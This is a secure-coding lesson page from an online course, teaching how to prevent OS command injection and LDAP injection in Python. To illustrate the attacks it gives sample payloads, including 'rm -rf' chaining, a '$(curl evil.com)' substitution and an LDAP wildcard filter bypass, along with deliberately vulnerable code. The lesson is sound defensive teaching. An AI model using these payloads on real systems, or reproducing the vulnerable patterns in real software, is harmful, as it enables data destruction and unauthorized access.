Secure Coding & OWASP Top 10 for Backend · Lezione

Prevenire le injection di comandi e LDAP

Impari come funzionano la command injection del sistema operativo e la LDAP injection e come difenderti con API sicure, allow-list e una codifica corretta.

Lezione 4 di 413 passaggi

Prevenire le injection di comandi e LDAP è una lezione Secure Coding & OWASP Top 10 for Backend gratuita su CoddyKit. Questa è la lezione 4 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Secure Coding & OWASP Top 10 for Backend, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Secure Coding & OWASP Top 10 for Backend include 4 lezioni in totale.

Parti di questa lezione non sono ancora state tradotte e vengono mostrate in inglese.

Beyond SQL Injection

Injection is not limited to SQL. Any time untrusted input is mixed into a command interpreter, you risk injection. Two dangerous cousins are OS command injection and LDAP injection.

This lesson shows how both work and how to stop them.

How Command Injection Works

Command injection happens when user input is passed to a shell. Shell metacharacters like ;, &&, and | let an attacker append their own commands.

  • Input file.txt; rm -rf / can delete data
  • Input $(curl evil.com) can exfiltrate or download

The Vulnerable Pattern

The danger is invoking a shell with a concatenated string. Here the user controls part of the command line.

import os

def ping(host):
    # DANGEROUS: host is interpolated into a shell command
    os.system('ping -c 1 ' + host)

# ping('8.8.8.8; rm -rf /tmp/data') runs two commands

Use Safe APIs

The fix is to avoid the shell entirely. Pass arguments as a list to an exec-style API so the OS treats input as a single argument, never as syntax.

import subprocess

def ping(host):
    # SAFE: no shell, host is a single argument
    subprocess.run(['ping', '-c', '1', host], shell=False, check=True)

Validate with Allow-Lists

When input feeds a command, restrict it to a known-good pattern. An allow-list rejects anything outside an expected set instead of trying to block bad characters.

import re

def is_valid_host(host):
    pattern = r'^[a-zA-Z0-9.-]{1,253}$'
    return re.match(pattern, host) is not None

print(is_valid_host('example.com'))
print(is_valid_host('8.8.8.8; rm -rf /'))

Avoid Shell Features

Never enable shell=True, eval, or string-based command builders with untrusted data. If you must use a shell, escape arguments with the platform quoting function, but prefer the no-shell approach.

What Is LDAP Injection?

LDAP injection targets directory queries used in authentication and lookups. Special characters like *, (, ), and \ alter the filter logic.

An input of * in a username field can match every entry, bypassing access checks.

Vulnerable LDAP Filter

Building filters by string concatenation lets attackers rewrite the query.

def build_filter(username):
    # DANGEROUS: username can contain LDAP metacharacters
    return '(&(uid=' + username + ')(active=TRUE))'

# build_filter('*)(uid=*') opens the filter to all users

Escaping LDAP Input

Escape special characters before inserting them into a filter, per RFC 4515. Most LDAP libraries provide an escape helper, use it for every dynamic value.

def escape_ldap(value):
    replacements = {'\\': '\\5c', '*': '\\2a', '(': '\\28', ')': '\\29', '\x00': '\\00'}
    out = ''
    for ch in value:
        out += replacements.get(ch, ch)
    return out

print(escape_ldap('*)(uid=*'))

Defense in Depth

Combine safe APIs, allow-list validation, and least privilege. Run processes under low-privilege accounts so even a successful injection cannot do much.

  • No shell where possible
  • Validate every input
  • Drop privileges before executing

Testing for Injection

Probe inputs with metacharacters during testing: semicolons and pipes for command fields, asterisks and parentheses for LDAP fields. Automated DAST tools and code review both help catch these flaws early.

Quick Check

Test your understanding of injection defenses.

Recap

You learned how command injection and LDAP injection work and how to stop them: avoid the shell with safe exec APIs, use allow-list validation, escape LDAP special characters, and apply least privilege. Treat every interpreter boundary as a place where injection can occur.

Gratis per iniziare

Impara Secure Coding & OWASP Top 10 for Backend con un tutor IA — gratis

Scrivi ed esegui vero codice nel tuo browser, ricevi aiuto istantaneo da un tutor IA disponibile 24/7, e riprendi da dove hai lasciato sul web o nell'app.

Corsi
12
Lezioni
48

Domande Frequenti

La lezione «Prevenire le injection di comandi e LDAP» è gratuita?

Sì — il testo completo di «Prevenire le injection di comandi e LDAP» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Secure Coding & OWASP Top 10 for Backend, passa a CoddyKit PRO. Il corso Secure Coding & OWASP Top 10 for Backend include 4 lezioni in totale.

Cosa imparerò in «Prevenire le injection di comandi e LDAP»?

Impari come funzionano la command injection del sistema operativo e la LDAP injection e come difenderti con API sicure, allow-list e una codifica corretta. Eserciti Secure Coding & OWASP Top 10 for Backend con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Secure Coding & OWASP Top 10 for Backend?

Non è richiesta alcuna esperienza precedente. Secure Coding & OWASP Top 10 for Backend su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 4 di 4.

Quanto tempo richiede la lezione «Prevenire le injection di comandi e LDAP»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Secure Coding & OWASP Top 10 for Backend?

Sì. Ogni lezione Secure Coding & OWASP Top 10 for Backend include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Tecniche avanzate di SQLi e NoSQLi
  2. Strategie complete di validazione degli input
  3. Content Security Policy (CSP) per il backend
  4. Prevenire le injection di comandi e LDAP
← Torna a Secure Coding & OWASP Top 10 for Backend